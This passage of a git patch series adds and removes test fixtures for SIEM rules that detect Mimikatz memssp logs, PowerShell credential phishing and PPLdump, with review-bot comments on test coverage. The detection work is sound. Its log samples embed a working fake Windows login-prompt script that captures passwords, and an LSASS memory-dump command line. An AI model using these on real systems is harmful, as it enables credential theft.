"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-11T12:10:22.3987265Z\"},\"EventRecordID\":\"385052\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3044\",\"ThreadID\":\"3900\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"UtcTime\",\"text\":\"2020-09-11 12:10:22.357\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-672c-5f5b-0d00-00000000fc00}\"},{\"Name\":\"ProcessId\",\"text\":\"640\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\System32\\\\another.log\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-09-11 12:10:22.357\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\system32\\another.log", "object.name": "another.log", "object.path": "c:\\windows\\system32\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", 
"recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"} +expect not {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_3.sc deleted file mode 100644 index 005a143f..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_3.sc +++ /dev/null 
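Review bot: Turning test_2 into the `expect not {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"}` case for `another.log`, together with the deletions of test_3, test_4 and test_5 in the following hunks, removes three checks the rule presumably still needs: a hit for `mimilsa.log` under `c:\windows\syswow64\` (old test_2, `expect 1`), a hit for `mimilsa.log` under a non-default path such as `c:\somefolder\` (old test_3, `expect 1`), and a miss when the creating process is not `lsass.exe` (old test_5, `process.exe` in system32, `expect not`). What survives only separates `mimilsa.log` from `another.log` in `c:\windows\system32\`, so a rule that keyed solely on the file name, or solely on the subject process, would still pass both files. If the old samples were dropped because they lacked a raw `body`, the better fix is to re-add them with a `body` built like this one (`TargetFilename` and `Image` adjusted per case) rather than to lose the coverage. The rule logic itself is outside this patch, so the above is inferred from the fixtures only.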
@@ -1,3 +0,0 @@ -{"action": "create", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\somefolder\\mimilsa.log", "object.name": "mimilsa.log", "object.path": "c:\\somefolder\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\somefolder\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\somefolder\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} - -expect 1 {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_4.sc deleted file mode 100644 index ef0c2b3e..00000000 
--- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_4.sc +++ /dev/null @@ -1,3 +0,0 @@ -{"action": "create", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\somefolder\\another.log", "object.name": "another.log", "object.path": "c:\\somefolder\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\somefolder\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\somefolder\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} - -expect not {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"} 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_5.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_5.sc deleted file mode 100644 index 627568cb..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_5.sc +++ /dev/null 
@@ -1,3 +0,0 @@ -{"action": "create", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\system32\\mimilsa.log", "object.name": "mimilsa.log", "object.path": "c:\\windows\\system32\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\process.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "process.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} - -expect not {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"} From 6ab49939b6553073b65874b75df4ea205fdf85b2 Mon Sep 17 00:00:00 2001 
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Sat, 29 Jul 2023 19:27:16 +0300 Subject: [PATCH 13/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Phishing=5Fwindows=5Fcr?= =?UTF-8?q?edentials=5Fpowershell=5Fscriptblock)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Phishing_windows_credentials_powershell_scriptblock/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Phishing_windows_credentials_powershell_scriptblock/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Phishing_windows_credentials_powershell_scriptblock/tests/test_1.sc new file mode 100644 index 00000000..d49df6e6 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Phishing_windows_credentials_powershell_scriptblock/tests/test_1.sc 
@@ -0,0 +1,4 @@ +{"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2019-09-09T13:35:09.3152300Z\"},\"EventRecordID\":\"1123\",\"Correlation\":{\"ActivityID\":\"{b5abe6c2-675c-0001-a601-acb55c67d501}\"},\"Execution\":{\"ProcessID\":\"5500\",\"ThreadID\":\"356\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"}},\"EventData\":{\"Data\":[{\"Name\":\"MessageNumber\",\"text\":\"1\"},{\"Name\":\"MessageTotal\",\"text\":\"1\"},{\"Name\":\"ScriptBlockText\",\"text\":\"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(\\\"Windows Security\\\", \\\"Please enter user credentials\\\", \\\"$env:userdomain\\\\$env:username\\\",\\\"\\\") $username = \\\"$env:username\\\" $domain = \\\"$env:userdomain\\\" $full = \\\"$domain\\\" + \\\"\\\\\\\" + \\\"$username\\\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(\\\"$full\\\",\\\"$password\\\") -ne $True){ $cred = $Host.ui.PromptForCredential(\\\"Windows Security\\\", \\\"Invalid Credentials, Please try again\\\", \\\"$env:userdomain\\\\$env:username\\\",\\\"\\\") $username = \\\"$env:username\\\" $domain = \\\"$env:userdomain\\\" $full = \\\"$domain\\\" + \\\"\\\\\\\" + \\\"$username\\\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object 
System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(\\\"$full\\\", \\\"$password\\\") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt\"},{\"Name\":\"ScriptBlockId\",\"text\":\"c7ca7056-b317-4fff-b796-05d8ef896dcd\"},{\"Name\":\"Path\"}]}}}", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.id": "c7ca7056-b317-4fff-b796-05d8ef896dcd", "object.process.cmdline": "function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, 
Please try again\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(\"$full\", \"$password\") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt", "object.process.id": "5500", "object.value": "function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(\"$full\", \"$password\") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt", "recv_ipv4": 
"127.0.0.1", "recv_time": "2023-06-17T11:06:31.317Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-09-09T13:35:09.315Z", "type": "raw", "uuid": "baac7d95-1a5c-4dfb-892d-e6dee90ffb79"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "execute", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Input Capture: GUI Input Capture", "correlation_name": "Phishing_windows_credentials_powershell_scriptblock", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Phishing_windows_credentials_powershell_scriptblock|msedgewin10|function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = 
$cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(\"$full\", \"$password\") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "command", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.process.cmdline": "function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(\"$full\", \"$password\") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt", "object.value": 
"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){ $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\") $username = \"$env:username\" $domain = \"$env:userdomain\" $full = \"$domain\" + \"\\\" + \"$username\" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(\"$full\", \"$password\") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000"} From 8f87f1bec1f3d4cdb0b719c5f1fdc71dcf37aa68 Mon Sep 17 00:00:00 2001 
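Review bot: This rule receives only a positive sample; unlike the Mimikatz tests earlier in the series there is no `expect not` case, so the test cannot show which part of the script block the rule keys on (the `PromptForCredential` prompt, the `ValidateCredentials` retry loop, or the `GetNetworkCredential().password` read). A second test with a benign 4104 script block (for instance an ordinary `Get-Credential` used for a remote session) and `expect not {"correlation_name": "Phishing_windows_credentials_powershell_scriptblock"}` would pin the rule's specificity. Separately, the token `R{START_PROCESS}` inside `ScriptBlockText` looks like a redaction placeholder carried over from the source sample rather than PowerShell; it is harmless in the fixture as long as the rule does not match on it, which is worth confirming because the same string is copied verbatim into `incident.aggregation.key` in the expectation.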
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Sat, 29 Jul 2023 19:41:54 +0300 Subject: [PATCH 14/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(PPL=5FBy?= =?UTF-8?q?pass=5Fvia=5FPPLDump=5FTool)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../PPL_Bypass_via_PPLDump_Tool/tests/test_1.sc | 5 +++++ .../PPL_Bypass_via_PPLDump_Tool/tests/test_2.sc | 6 ++++++ .../PPL_Bypass_via_PPLDump_Tool/tests/test_3.sc | 6 ++++++ .../PPL_Bypass_via_PPLDump_Tool/tests/test_4.sc | 5 +++++ 4 files changed, 22 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_3.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_4.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_1.sc new file mode 100644 index 00000000..44140873 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/PPL_Bypass_via_PPLDump_Tool/tests/test_1.sc 
@@ -0,0 +1,5 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2021-04-22T22:09:25.3896334Z\"},\"EventRecordID\":\"564589\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3352\",\"ThreadID\":\"4696\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2021-04-22 22:09:25.377\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-f415-6081-0000-001040fe4900}\"},{\"Name\":\"ProcessId\",\"text\":\"6316\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\PPLdump.exe\"},{\"Name\":\"FileVersion\",\"text\":\"?\"},{\"Name\":\"Description\",\"text\":\"?\"},{\"Name\":\"Product\",\"text\":\"?\"},{\"Name\":\"Company\",\"text\":\"?\"},{\"Name\":\"OriginalFileName\",\"text\":\"?\"},{\"Name\":\"CommandLine\",\"text\":\"PPLdump.exe -v lsass 
lsass.dmp\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-efc5-6081-0000-00203ace0b00}\"},{\"Name\":\"LogonId\",\"text\":\"0xbce3a\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=F1C0C54AA13037F46F55B721F7E2A2349A30DBCF,MD5=DBCA6A3860A106333FF6BE6306B2B186,SHA256=68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41,IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-f040-6081-0000-001046ac1b00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4864\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-efc5-6081-0000-00203ace0b00", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "773690", "object.process.cmdline": "PPLdump.exe -v lsass lsass.dmp", "object.process.cwd": "c:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": 
"c:\\users\\ieuser\\desktop\\ppldump.exe", "object.process.guid": "747f3d96-f415-6081-0000-001040fe4900", "object.process.hash.imphash": "C547F2E66061A8DFFB6F5A3FF63C0A74", "object.process.hash.md5": "DBCA6A3860A106333FF6BE6306B2B186", "object.process.hash.sha1": "F1C0C54AA13037F46F55B721F7E2A2349A30DBCF", "object.process.hash.sha256": "68612B1C72B8AA498530ACEB929ED44F1837B8BC52D1269E30A834931434FC41", "object.process.id": "6316", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "ppldump.exe", "object.process.original_name": "?", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "747f3d96-f040-6081-0000-001046ac1b00", "object.process.parent.id": "4864", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\desktop\\", "object.process.version": "?", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T18:02:46.496Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "773690", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-04-22T22:09:25.377Z", "type": "raw", "uuid": "32509031-dbdd-4326-89df-f0d67b16b61a"} +{"action": "access", "body": 
